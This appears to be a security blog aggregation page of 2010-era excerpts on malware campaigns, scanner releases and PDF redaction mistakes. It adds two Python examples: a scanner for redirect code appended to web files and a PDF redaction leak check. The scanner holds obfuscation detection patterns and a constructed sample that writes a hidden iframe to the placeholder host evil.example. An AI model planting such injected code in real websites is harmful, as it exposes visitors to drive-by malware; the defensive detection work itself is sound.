Information Filed Under ‘Web Service Security’ Category

IE zero day exploit prime suspect in Google attacks

Since last week, when Google disclosed some facts about the attacks against the Gmail accounts of Chinese human rights activists and decided to review the feasibility of doing business in China, everybody has been wondering just what kinds of exploits were used in the attack. It was clear that the recently patched Adobe Reader vulnerability described in APSB10-02 was the prime candidate for the attack, since the vulnerability had not been patched when the attacks occurred in mid-December. Recent examples of PDF exploits, which are well documented in ISC handlers’ diaries, show just how complex the attacks can be.

Go here to see the original:
IE zero day exploit prime suspect in Google attacks

Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

UPDATED, Friday, 15, 2010: The gang continues rotating the campaigns by targeting different brands. Over the past 24 hours they’ve been spamming the well-known “Notice of Underreported Income” theme, this time targeting HM Revenue and Customs (HMRC), and have also introduced new portfolios of typosquatted domains, in addition to changing the client-side-exploit-serving iFrame embedded on each and every page.

See more here:
Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

Statistics from the top 1,000,000 websites

The next version of Acunetix Web Vulnerability Scanner (version 7) will contain a much improved HTTP stack. While testing, we wanted to test the new HTTP stack on as many sites as possible to make sure we didn’t introduce any bugs.

Go here to read the rest:
Statistics from the top 1,000,000 websites

Registered malware

As already discussed by Mike, malware authors love to innovate when it comes to persistence and hiding their nefarious creations from detection, and although most of the schemes are not unknown to analysts, they still show that malware authors are constantly on the prowl and evolving their techniques. The example I have is of yet another registry-centric malware which, by the nature of its construction, has several advantages in defeating naive security software. The sample, detected as Troj/RegExec-A, is essentially a multi-component threat comprising at least three components (dropper/installer, payload and loader). The dropper or installer component sets up the registry key and possibly some default payload, and then installs the loader component to be auto-launched by any number of autorun methods.

Continue reading here:
Registered malware

Acunetix WVS Version 6.5 build 20100111 released

An updated build of Acunetix WVS Version 6.5 has been released with a number of new security checks and bug fixes.

New security checks:
* Test for File Upload IIS bug filename.asp;.jpg
* Test for WP-Forum 2.3 vulnerabilities
* JBoss rmi ping (network script)

Bug fixes:
* Bugfix: Modified forms notifications from CSA
* Bugfix: CSA: Workaround for window.open with null parameters
* Fixed: In some specific scenarios the scheduler queue was restarting on its own
* Fixed: Node was not expanding automatically when manually adding a new logout link in the LSR

How to upgrade to build 20100111: On starting up Acunetix WVS, a pop-up window will automatically notify you that a more recent build is available for download. To download the latest build, navigate to the General > Program Updates node in the Tools explorer and click on Download and Install new build.

Excerpt from:
Acunetix WVS Version 6.5 build 20100111 released

Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

UPDATED: Sunday, January 10, 2010 – The post has been updated with the latest domains spammed within the past 24 hours. UPDATED: Saturday, January 09, 2010 – The post has been updated with the latest domains spammed within the past 24 hours. The spam campaign is ongoing.

Continued here:
Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

Top Ten Must-Read DDanchev Posts For 2009

The following ten posts have been featured due to their insightful content, the comprehensiveness of the topics covered, and plain simple exclusivity at the time of publishing, and not necessarily based on page views. Thank you for being a regular reader of my personal blog. Feel free to subscribe to my RSS feed, keep track of my posts at ZDNet’s Zero Day, or follow me on Twitter.

See the original post here:
Top Ten Must-Read DDanchev Posts For 2009

Top Ten Must-Read Posts at ZDNet’s Zero Day for 2009

The end of the year naturally means a rush to come up with ‘best of the best’ top lists consisting of your finest content. However, based on personal observations, during the holiday season the short attention span of the average reader becomes even shorter, with everyone looking forward to taking a well-deserved break. Therefore, the first working week of the new year appears to be the perfect moment to summarize some of my most insightful posts/analysis published at ZDNet’s Zero Day for 2009.

Go here to read the rest:
Top Ten Must-Read Posts at ZDNet’s Zero Day for 2009

Summarizing Zero Day’s Posts for December

The following is a brief summary of all of my posts at ZDNet’s Zero Day for December 2009. You can also go through previous summaries, as well as subscribe to my personal RSS feed or Zero Day’s main feed, or follow all of ZDNet’s blogs on Twitter.

Read more:
Summarizing Zero Day’s Posts for December

Anonymous Proxy Woes

Marco commented that the CSS history hack doesn’t work with hidemyass.com. Never having been there, I found myself clicking around on their site to find that it’s yet another CGI proxy. So after a few minutes of playing around, here is the list of problems or potential problems I have with hidemyass.com and most of the sites that are similar.

The rest is here:
Anonymous Proxy Woes

Popup & Focus URL Hijacking

I apologize ahead of time to whoever first sent me this; it’s been so long now that I have long since lost the original email. But at some point a few years ago someone sent me a small snippet of JavaScript that could cause a page to be replaced by another page in such a way that it didn’t matter if you looked at the URL bar, because after you looked at it, a few seconds later, it would be replaced by the evil site. Well, today I spent a few minutes toying around with other potential uses for that same code.

See the article here:
Popup & Focus URL Hijacking

The Koobface Gang Wishes the Industry "Happy Holidays"

Oops, they did it again: the Koobface gang, which is now officially describing itself as Ali Baba and the 40 Thieves LLC, has not only included a Koobface-themed background (notice the worm in the name) on Koobface-infected hosts, but has also included a “Wish Koobface Happy Holidays” script (last time I checked, 10,000 people had clicked it), followed by the most extensive message ever left by the gang, which amusingly attempts to legitimize the gang’s activities. In short, the message, with clear elements of PSYOPS, attempts to position the Koobface worm as software whose new features are requested by users, and claims that by continuing its development the authors are actually improving Facebook’s security systems. For the record, the Koobface botnet itself is only the tip of the iceberg of the malicious activities the group is involved in.

Here is the original post:
The Koobface Gang Wishes the Industry "Happy Holidays"

More on Troj/JSRedir-AK

Since first releasing detection (two days ago) for Troj/JSRedir-AK, SophosLabs have seen thousands of websites affected by it. Since blogging yesterday we have seen a few minor variants and have had to update our detection. One of the updates has been to detect the malicious script when it is appended to HTML files within script tags, as well as when it is appended to JavaScript files.

View original post here:
More on Troj/JSRedir-AK
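
The two placements the excerpt above describes (a script block tacked on after the end of an HTML document, and code appended to the tail of an existing .js file) are easy to look for in a web root. The following scanner is an added example written for this page; it is not SophosLabs’ detection and not a signature for Troj/JSRedir-AK. The obfuscation markers, the line-length threshold and all sample files are assumptions constructed for the demonstration, and the `evil.example` host is a placeholder rather than a real indicator.

```python
"""Heuristic scan for redirect code appended to the tail of web files.

Added example, not SophosLabs' detection or a signature for Troj/JSRedir-AK.
It looks only in the two places the post names: a <script> block that follows
the closing </html> tag, and the final line of a .js file. The obfuscation
markers and LONG_LINE threshold are assumed heuristics; all samples below are
constructed.
"""
import re
from typing import List

OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode(", "document.write(")
LONG_LINE = 200  # assumed: hand-written JS rarely packs a single line this long

# A <script> block that appears after the document has already ended.
TRAILING_SCRIPT_RE = re.compile(r"</html>\s*(<script\b[^>]*>.*?</script>)", re.I | re.S)


def looks_obfuscated(code: str) -> bool:
    """Two markers, or one marker on a very long line, counts as suspicious."""
    hits = sum(1 for marker in OBFUSCATION_MARKERS if marker in code)
    longest = max((len(line) for line in code.splitlines()), default=0)
    return hits >= 2 or (hits >= 1 and longest >= LONG_LINE)


def scan_html(text: str) -> List[str]:
    """Flag every <script> block placed after </html>, noting obfuscation if seen."""
    findings = []
    for m in TRAILING_SCRIPT_RE.finditer(text):
        reason = "script block after </html>"
        if looks_obfuscated(m.group(1)):
            reason += " with obfuscation markers"
        findings.append(reason)
    return findings


def scan_js(text: str) -> List[str]:
    """Flag a .js file whose last non-blank line looks like injected obfuscated code."""
    lines = [line for line in text.splitlines() if line.strip()]
    if lines and looks_obfuscated(lines[-1]):
        return ["obfuscated code appended as final line of script"]
    return []


def scan(name: str, text: str) -> List[str]:
    """Dispatch on file extension; anything else is out of scope for this check."""
    lower = name.lower()
    if lower.endswith((".html", ".htm")):
        return scan_html(text)
    if lower.endswith(".js"):
        return scan_js(text)
    return []


# Constructed samples (evil.example is a placeholder host, not a real IOC).
CLEAN_HTML = "<html><body><p>Welcome</p></body></html>\n"
INFECTED_HTML = CLEAN_HTML + (
    '<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65"))</script>\n'
)
CLEAN_JS = "function add(a, b) {\n  return a + b;\n}\n"
INFECTED_JS = CLEAN_JS + (
    "var h=String.fromCharCode(104,116,116,112,58,47,47);"
    "document.write('<iframe src=\"'+h+'evil.example/in.php\" width=1 height=1></iframe>');\n"
)

if __name__ == "__main__":
    for name, text in (("index.html", CLEAN_HTML), ("index.html", INFECTED_HTML),
                       ("app.js", CLEAN_JS), ("app.js", INFECTED_JS)):
        print(name, scan(name, text) or "clean")
```

Run it over a web root with `os.walk` and feed each file to `scan`; a hit on an HTML file is worth reviewing regardless of the obfuscation verdict, since there is no legitimate reason for a script block to follow `</html>`.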

Koobface-Friendly Riccom LTD – AS29550 – (Finally) Taken Offline

Last week, Josh Kirkwood, Network Engineer at Blue Square Data Group Services Limited, with whom I’ve been keeping in touch regarding the blackhat SEO activity courtesy of the Koobface gang, and the actual Koobface botnet activity that’s been taking place there for months, pinged me with an interesting email: “Riccom are now gone” (AS29550). He also pinged the folks at hpHosts in response to their posts once again emphasizing the malicious activity taking place there. Since I’ve been analyzing Riccom LTD activity in the context of “in-the-wild” blackhat SEO campaigns launched by the Koobface gang, followed by establishing direct Koobface botnet connections, as well as sharing data with Josh, Riccom LTD clearly deserves a brief

A Diverse Portfolio of Fake Security Software – Part Twenty Four

Good traditions are not meant to be broken, in particular the “Diverse Portfolio of Fake Security Software” series. And with scareware losses to customers already (conservatively) estimated at $150 million, combined with the overwhelming evidence gathered throughout the entire year of scareware becoming the monetization method of choice for the majority of cybercriminals, in 2010 we’ll see the peak of a fully matured business model that’s offering one of the highest payout rates within the underground marketplace. How can this underground business model be undermined?

Follow this link:
A Diverse Portfolio of Fake Security Software – Part Twenty Four

Mr-T smbenum and Firefox userprefs

I took a few minutes today to update the Master Recon Tool to include both the default Firefox preferences and smbenum (enumeration of programs in Internet Explorer). This isn’t a big deal or anything; it’s more that I think people aren’t really clued in to all the stuff that can leak from a browser.

Visit link:
Mr-T smbenum and Firefox userprefs

Sophos’s – Best Practices for Facebook security

Security tips related to the safe use of Facebook can be found in the following links:

Sophos’s – Best Practices for Facebook security
http://www.sophos.com/security/best-practice/facebook/

QUOTE: ID fraudsters target Facebook and other social networking sites to harvest information about you. Here’s how we recommend you set your Facebook privacy options to protect against online identity theft.
* Adjust Facebook privacy settings to help protect your identity
* Read the Facebook Guide to Privacy
* Think carefully about who you allow to become your friend
* Show “limited friends” a cut-down version of your profile
* Disable options, then open them one by one

Facebook – Guide to Privacy
http://www.facebook.com/privacy/explanation.php

Continue reading here:
Sophos’s – Best Practices for Facebook security

ISC Security Awareness education for Youth

One of the ISC handlers shares some worthwhile material on the importance of security awareness training. It’s important to teach children safety, as the Internet is a dangerous environment when it comes to email, web links, and malware.

Go here to read the rest:
ISC Security Awareness education for Youth

Adobe PDF Reader – Zero Day JavaScript attacks circulating in the wild

Please be careful with all PDF files, keep AV protection updated, and look for future Adobe releases which will address this issue. I usually keep JS off unless it’s required to fill out a PDF form.

See original here:
Adobe PDF Reader – Zero Day JavaScript attacks circulating in the wild

How Not To Redact Confidential Information

We read with interest about yet another PDF redaction snafu. In this case it was the attorney of TJX / 7-Eleven hacker Albert Gonzalez, who posted an indictment that was digitally redacted and posted online as a PDF file, making it trivial to recover the original unredacted text. Last week the US Travel Security Authority (TSA) sacked five people for posting a digitally “redacted” security guideline document online.

Excerpt from:
How Not To Redact Confidential Information
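
The failure the excerpt above describes is that a black box drawn over text does not remove the text object from the PDF’s content stream, so the words are still there for any tool that decompresses the stream. The following check is an added example written for this page, not code from the post or from any PDF product: it builds a constructed one-page PDF both the wrong way (text drawn, rectangle painted over it) and the right way (the text never enters the content stream), then inflates every stream and pulls out the string operands of the `Tj` text-showing operator. Handling only simple literal strings (no hex strings, `TJ` arrays or escaped parentheses) is an assumed simplification; the secret value and the page layout are constructed. Only the Python standard library is used.

```python
"""Check whether 'redacted' text survives inside a PDF's content streams.

Added example (not from the post or any PDF tool). build_pdf() constructs a
minimal one-page PDF: with remove_text=False the secret is drawn and a black
rectangle is painted over it; with remove_text=True only the rectangle is
drawn. leaked_terms() inflates every stream and looks for the redacted terms
among the literal-string operands of Tj (assumed simplification: hex strings,
TJ arrays and escaped parentheses are not parsed).
"""
import re
import zlib
from typing import List

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
TJ_LITERAL_RE = re.compile(rb"\(([^()]*)\)\s*Tj")


def build_pdf(secret: str, remove_text: bool) -> bytes:
    """Constructed minimal PDF with one page and a FlateDecode content stream."""
    text_op = b"" if remove_text else (
        b"BT /F1 12 Tf 50 705 Td (" + secret.encode("latin-1") + b") Tj ET\n")
    box_op = b"0 g 45 700 220 18 re f\n"  # black rectangle over the text position
    content = zlib.compress(text_op + box_op)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R"
        b" /Resources << /Font << /F1 5 0 R >> >> >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(content)
        + content + b"\nendstream",
        b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objs) + 1, xref_at)
    return bytes(out)


def shown_text(pdf: bytes) -> List[str]:
    """Inflate every stream (raw bytes for unfiltered ones) and collect Tj operands."""
    found = []
    for m in STREAM_RE.finditer(pdf):
        raw = m.group(1)
        try:
            data = zlib.decompress(raw)
        except zlib.error:
            data = raw  # stream was not FlateDecode-compressed
        found.extend(lit.decode("latin-1") for lit in TJ_LITERAL_RE.findall(data))
    return found


def leaked_terms(pdf: bytes, redacted: List[str]) -> List[str]:
    """Return the redacted terms that are still drawable text in the PDF."""
    joined = " ".join(shown_text(pdf))
    return [term for term in redacted if term in joined]


if __name__ == "__main__":
    secret = "ACCOUNT 12345"  # constructed
    for label, remove in (("box over text", False), ("text removed", True)):
        pdf = build_pdf(secret, remove_text=remove)
        print(label, "->", leaked_terms(pdf, [secret]) or "clean")
```

Note that grepping the raw file for the secret is not a substitute for this check: the content stream is deflated, so the plaintext is only visible after inflation, which is exactly what any PDF reader or text extractor does before rendering.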